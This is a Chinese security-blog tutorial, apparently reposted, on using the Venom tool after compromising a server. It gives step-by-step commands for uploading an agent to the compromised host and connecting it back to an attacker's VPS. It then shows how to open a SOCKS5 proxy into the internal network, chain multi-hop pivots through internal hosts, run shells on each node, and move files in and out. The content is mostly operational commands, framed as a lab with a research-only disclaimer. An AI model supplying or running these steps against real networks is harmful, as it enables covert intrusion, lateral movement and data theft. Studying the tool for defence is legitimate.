Venom工具的使用

admin 2022年1月4日23:01:57安全工具评论33 views1946字阅读6分29秒阅读模式

Venom工具的使用

文章来源:安全鸭

前提:假设拿到某台服务器shell,可以上传文件且具有执行权限;

项目地址(编译后):https://github.com/Dliv3/Venom/releases
Venom工具的使用

一、进入目标内网

1.上传admin_linux_x64到VPS上,运行并监听本地11111端口:

chmod 777 admin_linux_x64
./ admin_linux_x64 -lport 11111
  • 1

  • 2

Venom工具的使用
2.利用已经拿到的的shell上传agent_linux_x64文件到目标服务器,并执行

chmod 777 agent_linux_x64
./agent_linux_x64 -rhost x.x.x.x -rport 11111
# x.x.x.x是指VPS 的IP
  • 1

  • 2

  • 3

Venom工具的使用

3.venom服务端有回显则表示连接成功,建立socks连接:

goto 1
socks 11112
# Start a socks5 server in port 11112
  • 1

  • 2

  • 3

Venom工具的使用
4.本地通过Proxifier软件连接VPS服务器开放的11112端口,就可以访问到目标内网
Venom工具的使用
参考链接:https://xz.aliyun.com/t/4058

如果目标内网还需要存在多个网段,那么就需要进行多级代/理。以下内容为转载,原文链接:

https://blog.csdn.net/u011215939/article/details/103403545

二、穿透内网

Venom可连接节点,然后以节点为跳板,构建多级代//理。

实验环境:

1.服务器 IP:x.x.x.x

2.内网的机器三台windows IP地址:192.168.3.160、192.168.3.15、192.168.3.30

3.设想服务器要访问最里面的192.168.3.160只能一层一层的依次访问;192.168.3.160只能和192.168.3.30相互访问;192.168.3.30可以和192.168.3.15,192.168.3.160访问而不能访问服务器;最后3.15能被服务器访问,也能和3.30相互访问;利用Venom来进行一层一层的代理实现内网穿透;
Venom工具的使用

实验开始

1.将下载好的Venom工具依次上传到对应的机器里面,服务器上面上传admin_linux_x64,并修改权限 chmod 777 admin_linux_x64
Venom工具的使用
2、使用./admin_linux_x64文件来监听本地端口,内网的机器就是用agent.exe文件来连接服务器。服务器执行命令./admin_linux_x64 -lport 4343,监听本地4343端口
Venom工具的使用
3、所有机器都已经上传了Venom工具包并解压,环境都是windows;在192.168.3.15机器上面执行连接操作;执行命令agent.exe -rhost 120.10.120.X -rport 4343
Venom工具的使用
服务器监听成功,192.168.3.15被监听:
Venom工具的使用
4、然后在服务器上进行操作;help查看命令。这里我们要使用到show,goto,listen,exit,shell这几个命令;

① 执行show命令,可以看见刚刚连接成功的一个节点;
Venom工具的使用
② goto 1可以切换到1节点上面去
Venom工具的使用
③shell 执行命令
Venom工具的使用
④exit 退出,进行下一步的监听操作。在不退出1节点的基础上面执行listen 4343端口进行监听本地端口
Venom工具的使用
5、在第二台内网主机192.168.3.30机器上面执行命令:

agent.exe -rhost 192.168.3.15 -rport 4343
  • 1

Venom工具的使用
6. 此时服务器成功跨越192.168.3.15连接到192.168.3.30。

①执行show命令发现新增了一个节点;
Venom工具的使用
②切换到节点2中: goto 2 。执行命令:shell
Venom工具的使用
7.现在进行最后一步实验:VPS服务器穿透192.168.3.15192.168.3.30 连接到最内层192.168.3.160;依次执行命令exit,listen 4343 ;192.168.3.30机器开启本地监听:
Venom工具的使用
①在192.168.3.160机器上面进行连接操作,执行命令:

agent.exe -rhost 192.168.3.30 -rport 4343
  • 1

Venom工具的使用
②服务器>show;成功建立监听
Venom工具的使用
③goto 3 切换到3节点。shell 执行命令。至此内网穿透实验成功
Venom工具的使用
其他:

1.以上监听的端口在节点上面进行listen的时候可以不一致,一台机器上也可以监听多个端口

2.本地文件上传于下载;
上传:

upload 2018.jpg C:2018.jpg 
#将本地的文件上传到节点1的C盘根目录下面
  • 1

  • 2

Venom工具的使用
下载

download C:1.gif 1.gif 
# 将节点1中的文件下载到本地
  • 1

  • 2

Venom工具的使用
3.Venom工具在执行过程中尽量不要将命令写错,写错后无法删除,只能重头来过。

侵权请私聊公众号删文

Venom工具的使用

Venom工具的使用

Venom工具的使用

本文始发于微信公众号(黑白之道):Venom工具的使用

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月4日23:01:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Venom工具的使用 http://cn-sec.com/archives/467680.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: